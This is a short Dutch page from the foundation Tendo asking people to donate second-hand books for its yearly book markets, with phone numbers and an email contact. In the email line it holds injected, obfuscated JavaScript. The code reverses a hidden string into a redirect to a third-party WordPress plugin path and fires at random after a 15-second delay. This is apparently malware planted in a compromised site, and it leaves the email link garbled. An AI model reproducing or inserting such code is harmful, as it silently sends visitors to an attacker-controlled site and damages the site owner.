Boekenmarkt

Tendo organiseert 2e hands Boekenmarkten. Hiervoor nemen wij graag uw verkoopbare boeken in ontvangst om deze te verkopen op onze eigen boekenmarkten of andere markten. Sinds 2010 is dit een jaarlijks terugkomende actie van stichting Tendo. Heeft u nog boeken over? Wij kunnen ze dus goed gebruiken. De boeken moeten compleet zijn en er goed uitzien.

U kunt contact met ons op nemen via de volgende telefoonnummers 06-14421919, of 050-2309001 (na 18.00 uur). Wij maken graag een afspraak om de boeken bij u op te halen.

U kunt ook een email sturen naar $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s%20boeken”>info@stichtingtendo.nl